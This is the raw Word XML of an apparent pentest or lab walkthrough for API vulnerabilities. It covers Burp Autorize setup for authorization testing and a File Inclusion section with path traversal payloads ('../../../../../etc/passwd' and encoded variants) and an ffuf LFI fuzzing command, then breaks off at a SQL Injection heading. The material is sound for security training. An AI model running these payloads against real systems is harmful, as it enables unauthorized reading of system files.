                <v:shape id="Shape 212" style="position:absolute;width:476;height:476;left:2381;top:3143;" coordsize="47625,47625" path="m47625,23813c47625,26967,47021,30004,45812,32920c44604,35840,42883,38413,40650,40649c38418,42881,35842,44602,32925,45808c30008,47017,26970,47622,23813,47625c20655,47622,17617,47017,14700,45808c11783,44602,9207,42881,6975,40649c4742,38413,3021,35840,1813,32920c604,30004,0,26967,0,23813c0,20651,604,17614,1813,14697c3021,11781,4742,9206,6975,6973c9207,4739,11783,3018,14700,1811c17617,605,20655,0,23813,0c26970,0,30008,605,32925,1811c35842,3018,38418,4739,40650,6973c42883,9206,44604,11781,45812,14697c47021,17614,47625,20651,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 5683" style="position:absolute;width:476;height:476;left:4857;top:6286;" coordsize="47625,47625" path="m0,0l47625,0l47625,47625l0,47625l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 5684" style="position:absolute;width:476;height:476;left:4857;top:9429;" coordsize="47625,47625" path="m0,0l47625,0l47625,47625l0,47625l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 5685" style="position:absolute;width:476;height:476;left:4857;top:12287;" coordsize="47625,47625" path="m0,0l47625,0l47625,47625l0,47625l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 5686" style="position:absolute;width:476;height:476;left:4857;top:15144;" coordsize="47625,47625" path="m0,0l47625,0l47625,47625l0,47625l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 5687" style="position:absolute;width:476;height:476;left:7239;top:18288;" coordsize="47625,47625" path="m0,0l47625,0l47625,47625l0,47625l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 5688" style="position:absolute;width:476;height:476;left:7239;top:21145;" coordsize="47625,47625" path="m0,0l47625,0l47625,47625l0,47625l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">Add Authorize extension in </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:b/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>Burp suite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Bapp store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7137A369" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:left="1157" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>Make sure you have jython installed if not download from jython standalone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E84F72A" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:left="1157" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>In extension settings add the downloaded jysthon file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0B088F" w14:textId="56DE09F9" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="198"/>
        <w:ind w:left="1157" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">We will have </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>Authorize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab in </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> to work on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18542AFF" w14:textId="32EBC10D" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="393" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="1379" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">To set up Authorize under Temp headers add a user </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>Cookie: session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>= Turn on Authorize..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70023254" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="324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FD62D7E" wp14:editId="769BF9C9">
                <wp:extent cx="6581774" cy="971550"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4205" name="Group 4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71550"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="971550"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5689" name="Shape 5689"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="86677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0" name="Shape 5690"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="95250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85775" y="276980"/>
                            <a:ext cx="271470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F0D9D" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="107"/>
                                </w:rPr>
                                <w:t>Now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use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other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user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run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526953" y="276980"/>
                            <a:ext cx="348500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50808" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:i/>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="121"/>
                                </w:rPr>
                                <w:t>curl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9525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42888" y="600830"/>
                            <a:ext cx="428509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E81C0" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="110"/>
                                </w:rPr>
                                <w:t>We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can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test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see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multiple</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:spacing w:val="-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API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using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authorised.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62D7E" id="Group 4205" o:spid="_x0000_s1084" style="width:518.25pt;height:76.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 5689" o:spid="_x0000_s1085" style="position:absolute;top:8667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5690" o:spid="_x0000_s1086" style="position:absolute;top:9525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227" o:spid="_x0000_s1087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" path="m23813,v3157,,6195,605,9112,1811c35843,3018,38418,4739,40651,6973v2232,2233,3953,4808,5161,7725c47021,17614,47625,20651,47625,23813v,3154,-604,6190,-1813,9107c44604,35840,42883,38413,40651,40649v-2233,2232,-4808,3953,-7726,5162c30008,47020,26970,47625,23813,47625v-3158,,-6196,-605,-9113,-1814c11783,44602,9207,42881,6975,40649,4742,38413,3021,35840,1813,32920,604,30003,,26967,,23813,,20651,604,17614,1813,14698,3021,11781,4742,9206,6975,6973,9207,4739,11783,3018,14700,1811,17617,605,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 228" o:spid="_x0000_s1088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" path="m47625,23813v,3154,-604,6191,-1813,9107c44604,35840,42883,38413,40650,40649v-2232,2234,-4808,3954,-7725,5162c30008,47020,26970,47625,23813,47625v-3158,,-6196,-605,-9113,-1814c11783,44603,9207,42883,6975,40649,4742,38413,3021,35840,1813,32920,604,30004,,26967,,23813,,20655,604,17614,1813,14697,3021,11781,4742,9206,6975,6973,9207,4739,11783,3018,14700,1809,17617,602,20655,,23813,v3157,,6195,602,9112,1809c35842,3018,38418,4739,40650,6973v2233,2233,3954,4808,5162,7724c47021,17614,47625,20655,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 229" o:spid="_x0000_s1089" style="position:absolute;left:4857;top:2769;width:2714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15CF0D9D" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t>Now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use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other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user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run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090" style="position:absolute;left:25269;top:2769;width:348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08A50808" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:i/>
                            <w:color w:val="32373F"/>
                            <w:w w:val="121"/>
                          </w:rPr>
                          <w:t>curl</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 231" o:spid="_x0000_s1091" style="position:absolute;left:952;top:6381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" path="m23813,v3157,,6195,605,9112,1811c35843,3018,38418,4739,40651,6972v2232,2232,3953,4806,5161,7725c47021,17613,47625,20651,47625,23813v,3154,-604,6191,-1813,9111c44604,35840,42883,38413,40651,40649v-2233,2229,-4808,3950,-7726,5159c30008,47016,26970,47622,23813,47625v-3158,-3,-6196,-609,-9113,-1817c11783,44599,9207,42878,6975,40649,4742,38413,3021,35840,1813,32924,604,30004,,26967,,23813,,20651,604,17613,1813,14697,3021,11778,4742,9204,6975,6972,9207,4739,11783,3018,14700,1811,17617,605,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 232" o:spid="_x0000_s1092" style="position:absolute;left:2428;top:6008;width:4285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6DE81C0" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="110"/>
                          </w:rPr>
                          <w:t>We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can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test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see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multiple</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/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API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using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authorised.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51BB7A" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>2.File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D91EDA5" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="32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58CA8B01" wp14:editId="6D439049">
                <wp:extent cx="6581774" cy="9525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5763" name="Shape 5763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2" style="width:518.25pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,95">
                <v:shape id="Shape 5764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0256A0DF" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>File Inclusion 0x01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50663AE4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54032213" wp14:editId="173F1FED">
                <wp:extent cx="6581774" cy="847725"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4215" name="Group 4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847725"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="847725"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5765" name="Shape 5765"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="82867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2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2"/>
                                  <a:pt x="3021" y="35837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5775" y="276980"/>
                            <a:ext cx="2302460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37318" w14:textId="77777777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File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name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is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part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of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33337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3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5"/>
                                  <a:pt x="38418" y="4736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85775" y="562730"/>
                            <a:ext cx="5872829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BB22E" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="106"/>
                                </w:rPr>
                                <w:t>Include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../../../../../etc/passwd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place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of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passwd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that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captured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burp.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32213" id="Group 4215" o:spid="_x0000_s1093" style="width:518.25pt;height:66.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 5765" o:spid="_x0000_s1094" style="position:absolute;top:8286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235" o:spid="_x0000_s1095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" path="m23813,v3157,,6195,605,9112,1811c35843,3018,38418,4739,40651,6973v2232,2231,3953,4805,5161,7724c47021,17614,47625,20655,47625,23813v,3154,-604,6191,-1813,9111c44604,35841,42883,38416,40651,40650v-2233,2231,-4808,3952,-7726,5161c30008,47020,26970,47625,23813,47625v-3158,,-6196,-605,-9113,-1814c11783,44602,9207,42881,6975,40650,4742,38416,3021,35841,1813,32924,604,30004,,26967,,23813,,20655,604,17614,1813,14697,3021,11778,4742,9204,6975,6973,9207,4739,11783,3018,14700,1811,17617,605,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 236" o:spid="_x0000_s1096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" path="m47625,23813v,3154,-604,6191,-1813,9107c44604,35837,42883,38412,40650,40646v-2232,2232,-4808,3953,-7725,5162c30008,47016,26970,47622,23813,47625v-3158,-3,-6196,-609,-9113,-1817c11783,44599,9207,42878,6975,40646,4742,38412,3021,35837,1813,32920,604,30004,,26967,,23813,,20651,604,17614,1813,14697,3021,11778,4742,9204,6975,6973,9207,4739,11783,3018,14700,1809,17617,602,20655,,23813,v3157,,6195,602,9112,1809c35842,3018,38418,4739,40650,6973v2233,2231,3954,4805,5162,7724c47021,17614,47625,20651,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 237" o:spid="_x0000_s1097" style="position:absolute;left:4857;top:2769;width:2302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1E037318" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="109"/>
                          </w:rPr>
                          <w:t>File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name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is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part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of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query</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 238" o:spid="_x0000_s1098" style="position:absolute;left:3333;top:600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" path="m47625,23813v,3154,-604,6191,-1813,9111c44604,35840,42883,38413,40650,40649v-2232,2232,-4808,3953,-7725,5159c30008,47017,26970,47622,23813,47625v-3158,-3,-6196,-608,-9113,-1817c11783,44602,9207,42881,6975,40649,4742,38413,3021,35840,1813,32924,604,30004,,26967,,23813,,20651,604,17614,1813,14697,3021,11778,4742,9204,6975,6972,9207,4736,11783,3015,14700,1809,17617,602,20655,,23813,v3157,,6195,602,9112,1809c35842,3015,38418,4736,40650,6972v2233,2232,3954,4806,5162,7725c47021,17614,47625,20651,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 239" o:spid="_x0000_s1099" style="position:absolute;left:4857;top:5627;width:5872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454BB22E" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="106"/>
                          </w:rPr>
                          <w:t>Include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../../../../../etc/passwd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place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of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passwd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that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captured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burp.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EE194A" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>File Inclusion 0x02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554D2245" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="26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6BB88596" wp14:editId="20E9B811">
                <wp:extent cx="6581774" cy="847725"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4221" name="Group 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847725"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="847725"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5835" name="Shape 5835"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="82867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20"/>
                                  <a:pt x="38418" y="4741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1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19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85775" y="276982"/>
                            <a:ext cx="2799231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CF2E0" w14:textId="1635C2C1" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="110"/>
                                </w:rPr>
                                <w:t>Same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above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with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10"/>
                                </w:rPr>
                                <w:t>URL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encoding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33337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2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2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85775" y="562732"/>
                            <a:ext cx="4203348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DB01" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="106"/>
                                </w:rPr>
                                <w:t>Recursive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encoding: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6"/>
                                </w:rPr>
                                <w:t>..././..././..././.../..././etc/passwd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88596" id="Group 4221" o:spid="_x0000_s1100" style="width:518.25pt;height:66.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 5835" o:spid="_x0000_s1101" style="position:absolute;top:8286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241" o:spid="_x0000_s1102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" path="m23813,v3157,,6195,605,9112,1814c35843,3020,38418,4741,40651,6976v2232,2233,3953,4806,5161,7724c47021,17618,47625,20653,47625,23813v,3156,-604,6194,-1813,9112c44604,35840,42883,38416,40651,40652v-2233,2229,-4808,3950,-7726,5159c30008,47020,26970,47625,23813,47625v-3158,,-6196,-605,-9113,-1814c11783,44602,9207,42881,6975,40652,4742,38416,3021,35840,1813,32925,604,30007,,26969,,23813,,20653,604,17618,1813,14700,3021,11782,4742,9209,6975,6976,9207,4741,11783,3020,14700,1814,17617,605,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 242" o:spid="_x0000_s1103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" path="m47625,23813v,3156,-604,6194,-1813,9106c44604,35840,42883,38413,40650,40649v-2232,2232,-4808,3953,-7725,5162c30008,47020,26970,47625,23813,47625v-3158,,-6196,-605,-9113,-1814c11783,44602,9207,42881,6975,40649,4742,38413,3021,35840,1813,32919,604,30007,,26969,,23813,,20656,604,17618,1813,14697,3021,11779,4742,9206,6975,6976,9207,4741,11783,3020,14700,1814,17617,605,20655,,23813,v3157,,6195,605,9112,1814c35842,3020,38418,4741,40650,6976v2233,2230,3954,4803,5162,7721c47021,17618,47625,20656,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 243" o:spid="_x0000_s1104" style="position:absolute;left:4857;top:2769;width:2799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790CF2E0" w14:textId="1635C2C1" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="110"/>
                          </w:rPr>
                          <w:t>Same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as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above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with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10"/>
                          </w:rPr>
                          <w:t>URL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encoding</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 244" o:spid="_x0000_s1105" style="position:absolute;left:3333;top:600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" path="m47625,23813v,3159,-604,6194,-1813,9112c44604,35843,42883,38416,40650,40649v-2232,2232,-4808,3953,-7725,5162c30008,47020,26970,47625,23813,47625v-3158,,-6196,-605,-9113,-1814c11783,44602,9207,42881,6975,40649,4742,38416,3021,35843,1813,32925,604,30007,,26972,,23813,,20653,604,17614,1813,14697,3021,11779,4742,9203,6975,6973,9207,4741,11783,3020,14700,1814,17617,605,20655,,23813,v3157,,6195,605,9112,1814c35842,3020,38418,4741,40650,6973v2233,2230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245" o:spid="_x0000_s1106" style="position:absolute;left:4857;top:5627;width:4203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88ADB01" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="106"/>
                          </w:rPr>
                          <w:t>Recursive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encoding:</w:t>
                        </w:r>
                        <w:r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6"/>
                          </w:rPr>
                          <w:t>..././..././..././.../..././etc/passwd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288A9C" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="702"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>File Inclusion 0x03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5A3879" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="37" w:line="315" w:lineRule="auto"/>
        <w:ind w:left="760" w:right="82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471F4B" wp14:editId="60886626">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>95250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-276981</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="285750" cy="647700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="4248" name="Group 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647700"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="647700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72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72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3812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48" style="width:22.5pt;height:51pt;position:absolute;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:7.5pt;mso-position-vertical-relative:text;margin-top:-21.8096pt;" coordsize="2857,6477">
                <v:shape id="Shape 247" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,605,32925,1814c35843,3020,38418,4738,40651,6973c42883,9206,44604,11779,45812,14697c47021,17618,47625,20653,47625,23813c47625,26972,47021,30007,45812,32928c44604,35843,42883,38416,40651,40652c38418,42881,35843,44602,32925,45811c30008,47020,26970,47625,23813,47625c20655,47625,17617,47020,14700,45811c11783,44602,9207,42881,6975,40652c4742,38416,3021,35843,1813,32928c604,30007,0,26972,0,23813c0,20653,604,17618,1813,14697c3021,11779,4742,9206,6975,6973c9207,4738,11783,3017,14700,1811c17617,605,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 248" style="position:absolute;width:476;height:476;left:2381;top:3143;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30004,45812,32922c44604,35840,42883,38416,40650,40649c38418,42878,35842,44599,32925,45811c30008,47020,26970,47625,23813,47625c20655,47625,17617,47020,14700,45811c11783,44599,9207,42878,6975,40649c4742,38416,3021,35840,1813,32922c604,30004,0,26969,0,23813c0,20653,604,17618,1813,14700c3021,11782,4742,9206,6975,6976c9207,4741,11783,3020,14700,1814c17617,605,20655,0,23813,0c26970,0,30008,605,32925,1814c35842,3020,38418,4741,40650,6976c42883,9206,44604,11779,45812,14697c47021,17618,47625,20653,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 250" style="position:absolute;width:476;height:476;left:2381;top:6000;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30007,45812,32925c44604,35843,42883,38416,40650,40649c38418,42881,35842,44602,32925,45811c30008,47017,26970,47625,23813,47625c20655,47625,17617,47017,14700,45811c11783,44602,9207,42881,6975,40649c4742,38416,3021,35843,1813,32925c604,30007,0,26969,0,23813c0,20653,604,17614,1813,14697c3021,11779,4742,9206,6975,6973c9207,4738,11783,3020,14700,1814c17617,605,20655,0,23813,0c26970,0,30008,605,32925,1814c35842,3020,38418,4738,40650,6973c42883,9206,44604,11779,45812,14697c47021,17614,47625,20653,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373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32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">Save the request and add FUZZ in place of file name and ffuf it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>ffuf -request api-req.txt -request-proto http -w /usr/share/seclists/Fuzzing/LFI/LFIJhaddix.txt -fw 19,20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79353D77" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="324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6BC39AD7" wp14:editId="4A181E8B">
                <wp:extent cx="6581774" cy="370718"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4228" name="Group 4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370718"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="370718"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5873" name="Shape 5873"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="265943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" name="Shape 5874"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="351668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33375" y="373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85775" y="0"/>
                            <a:ext cx="3453180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7F521" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                </w:rPr>
                                <w:t>....//....//....//....//....//....//....//....//etc/passed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39AD7" id="Group 4228" o:spid="_x0000_s1107" style="width:518.25pt;height:29.2pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,3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">
                <v:shape id="Shape 5873" o:spid="_x0000_s1108" style="position:absolute;top:2659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5874" o:spid="_x0000_s1109" style="position:absolute;top:3516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253" o:spid="_x0000_s1110" style="position:absolute;left:3333;top:37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" path="m47625,23813v,3156,-604,6194,-1813,9109c44604,35840,42883,38416,40650,40652v-2232,2229,-4808,3950,-7725,5159c30008,47020,26970,47625,23813,47625v-3158,,-6196,-605,-9113,-1814c11783,44602,9207,42881,6975,40652,4742,38416,3021,35840,1813,32922,604,30007,,26969,,23813,,20653,604,17614,1813,14697,3021,11779,4742,9203,6975,6973,9207,4741,11783,3020,14700,1814,17617,605,20655,,23813,v3157,,6195,605,9112,1814c35842,3020,38418,4741,40650,6973v2233,2230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254" o:spid="_x0000_s1111" style="position:absolute;left:4857;width:3453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577F521" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                          </w:rPr>
                          <w:t>....//....//....//....//....//....//....//....//etc/passed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83F153" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>3.SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CDB0A2" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0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A589ED4" wp14:editId="54D1E6CF">
                <wp:extent cx="6581774" cy="9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
